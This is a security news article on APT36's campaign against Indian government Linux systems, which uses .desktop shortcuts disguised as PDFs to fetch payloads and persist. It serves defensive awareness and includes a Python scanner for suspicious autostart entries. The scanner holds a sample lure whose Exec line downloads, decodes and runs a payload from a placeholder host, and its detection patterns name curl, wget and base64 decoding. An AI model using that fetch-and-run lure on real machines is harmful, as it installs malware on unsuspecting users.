APT36’s Sneaky Malware Campaign Targeting Linux Systems
APT36, also known as Transparent Tribe, Mythic Leopard, Earth Karkaddan, or Operation C-Major, is a Pakistan-linked cyber-espionage group that has spent more than a decade targeting Indian government, military, and diplomatic institutions. In August 2025, cybersecurity researchers from two security firms, Cyfirma and Cloudsek, revealed a new campaign relying on deception and persistence rather than cutting-edge exploits.
This operation uses Linux's everyday desktop shortcuts to deliver hidden malware, effectively disguising malicious actions as harmless user activity. The attack highlights how advanced groups increasingly focus on stealth and social engineering rather than brute-force technical tricks. By weaponizing something as ordinary as a desktop shortcut, APT36 manages to trick users into launching malware without realizing anything is wrong.
The campaign begins with phishing emails carrying ZIP archives that appear to contain legitimate documents. These archives contain files with names such as Meeting_Notice_Ltr_ID1543ops.pdf.desktop or PROCUREMENT_OF_MANPORTABLE_&_COMPAC.pdf.desktop. To most users, these look like ordinary PDFs. In reality, they are not documents but .desktop files, shortcuts Linux systems use to launch applications.
When opened, the file executes a set of commands defined in its hidden configuration. These commands create a temporary file in the /tmp directory, named with a timestamp to avoid detection, and then fetch encoded payloads from attacker-controlled servers or cloud services such as Google Drive. The payload is decoded, marked as executable, and launched. At the same time, a decoy PDF is opened in Firefox to reassure the user that they have indeed opened a regular file.
The attackers enhance the illusion by giving the file a PDF-style icon and instructing the system to run without showing a terminal window. They also configure the shortcut to run automatically whenever the user logs in. This means that once the user has been tricked into clicking, the malware remains active on the system indefinitely.
Once the malicious payload is running, it quickly checks whether it is being executed in a sandbox or debugged by security analysts. If no analysis environment is detected, it installs itself more firmly into the system by ensuring persistence through autostart settings. It then reaches out to its command-and-control servers, in some cases through domains such as seemysitelive[.]store or securestore[.]cv.
The communication relies on WebSocket connections, giving the attacker a quiet, continuous control channel. Through this channel, APT36 threat actors can exfiltrate sensitive data, move further inside a network, or issue new commands. The design ensures that, once the initial deception succeeds, attackers retain access and control without drawing evident attention.
What makes this approach particularly dangerous is how ordinary it looks from the victim's perspective. They see a document open in Firefox, and nothing unusual happens. In the background, malware has just been delivered, installed, and connected to a remote controller.
Deceptively Simple, but so Effective
APT36's strategy works because it builds on three strengths: familiarity, subtlety, and persistence. The familiarity comes from the naming and appearance of the files, which resemble routine government or business documents. The subtlety comes from how the malware hides its execution, avoiding visible windows and presenting a convincing decoy file to distract the user. The persistence lies in how the .desktop file ensures that the malicious code will run every time the system starts up, allowing the attackers to maintain long-term access.
The group also shows careful tailoring to its environment. By targeting BOSS Linux, a distribution commonly used in Indian government institutions, APT36 demonstrates a focused approach. Rather than casting a wide net, it designs its tools specifically for the systems its targets are most likely to run, significantly increasing its chances of success.
Researchers suggest several measures that organizations can take to reduce the risk of being victimized by such campaigns. At the network level, defenders can block access to known malicious domains like seemysitelive[.]store and securestore[.]cv, preventing infected systems from communicating with their controllers. On individual machines, administrators should regularly check for unusual .desktop files in login or autostart directories, particularly those that call Bash commands or contain encoded data.
Proactive monitoring can also help. Looking for temporary files with suspicious names, inspecting memory for unexpected binaries, or identifying active WebSocket processes can uncover infections that have already taken hold. Strengthening email security is equally essential: filtering ZIP attachments containing disguised .desktop files can stop many attacks before they reach vulnerable end users.
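The check described above (unusual .desktop files in autostart directories whose Exec= line wraps shell commands, fetches from the network, decodes embedded data, or writes to /tmp, combined with a document-style name and Terminal=false as described earlier) can be scripted. The following is an added triage example, not code from the article or from either research firm; the sample entry and the host example.invalid are constructed placeholders, and the pattern list is an assumption to be tuned per environment.

```python
import re
from pathlib import Path

# Traits of an Exec= line worth a closer look; each label becomes one finding.
EXEC_PATTERNS = {
    "shell-wrapper": re.compile(r"\b(bash|sh)\s+-c\b"),
    "network-fetch": re.compile(r"\b(curl|wget)\b"),
    "decoder": re.compile(r"\bbase64\b[^;|]*-d|\bxxd\s+-r|\bopenssl\s+enc\b"),
    "tmp-write": re.compile(r"/tmp/"),
}
DOC_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)$", re.IGNORECASE)

def parse_desktop_entry(text):
    # Minimal parser for the [Desktop Entry] group; other groups are ignored.
    entry, in_group = {}, False
    for line in map(str.strip, text.splitlines()):
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
        elif in_group and "=" in line and not line.startswith("#"):
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry

def inspect_desktop_entry(text, filename):
    """Return the suspicious traits found in one .desktop file (empty list = clean)."""
    entry = parse_desktop_entry(text)
    exec_line = entry.get("Exec", "")
    findings = [label for label, rx in EXEC_PATTERNS.items() if rx.search(exec_line)]
    # File or display name ending in a document extension: a launcher dressed up as a document.
    if DOC_EXT.search(Path(filename).stem) or DOC_EXT.search(entry.get("Name", "")):
        findings.append("document-lookalike-name")
    # Shell wrapper plus Terminal=false: the commands run with nothing shown to the user.
    if "shell-wrapper" in findings and entry.get("Terminal", "").lower() == "false":
        findings.append("hidden-terminal")
    return findings

def scan_autostart_dirs(dirs=None):
    """Map each flagged .desktop file in the XDG autostart directories to its findings."""
    dirs = dirs or [Path.home() / ".config/autostart", Path("/etc/xdg/autostart")]
    files = [p for d in dirs for p in Path(d).glob("*.desktop")]
    return {str(f): hits for f in files
            if (hits := inspect_desktop_entry(f.read_text(errors="replace"), f.name))}

# Constructed sample modelled on the lure the article describes; example.invalid is
# a placeholder host, not an indicator from the campaign.
SAMPLE_LURE = """[Desktop Entry]
Name=Meeting_Notice.pdf
Terminal=false
Exec=bash -c "curl -s https://example.invalid/p | base64 -d > /tmp/.f; chmod +x /tmp/.f; /tmp/.f; firefox decoy.pdf"
"""
```

Findings are triage hints rather than verdicts: a legitimate launcher that uses `sh -c` with `Terminal=false` will also be flagged and should be reviewed by hand.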
Perhaps most importantly, organizations need to raise awareness among their staff. Many cyberattacks succeed because people assume familiar icons and filenames can be trusted. Training users to be cautious about unexpected attachments, even ones that appear to be PDFs (a format often perceived as inherently safe), can stop similar attacks long before persistence is achieved.
APT36's campaign reminds us that cyber-espionage groups do not always need advanced exploits to succeed. Instead, they rely on careful planning, knowledge of their target environment, and subtle deception. Turning a standard feature of Linux into a delivery mechanism for malware demonstrates how even the most trusted parts of an operating system can be misused.
The lesson is equally clear for defenders. Security is not just about patching vulnerabilities but also about recognizing how ordinary tools can be repurposed for malicious ends. Vigilance, user education, and routine system checks are as critical as any firewall or antivirus product.
This campaign offers end users an important insight into how modern cyberattacks unfold. The threat does not always come from dramatic breaches or visible system crashes. Often, it arrives through a simple click on a file that looks entirely safe. Behind the scenes, attackers may already be in control.
APT36's use of disguised .desktop files shows that cyber-espionage can thrive on ordinary features and everyday trust. By staying alert, questioning unexpected attachments, and applying basic defensive measures, individuals and organizations can blunt the effectiveness of such campaigns. Cybersecurity is not only about technology; it is about awareness and habits. The attackers in this case succeeded by exploiting trust. Defenders can succeed by reinforcing vigilance.
Karolis Liucveikis
Experienced software engineer, passionate about behavioral analysis of malicious apps
Author and general operator of PCrisk's News and Removal Guides section. Co-researcher working alongside Tomas to discover the latest threats and global trends in the cyber security world. Karolis has experience of over 8 years working in this branch. He attended Kaunas University of Technology and graduated with a degree in Software Development in 2017. Extremely passionate about technical aspects and behavior of various malicious applications.
PCrisk security portal is brought by a company RCS LT.
Joined forces of security researchers help educate computer users about the latest online security threats. More information about the company RCS LT.
Our malware removal guides are free. However, if you want to support us you can send us a donation.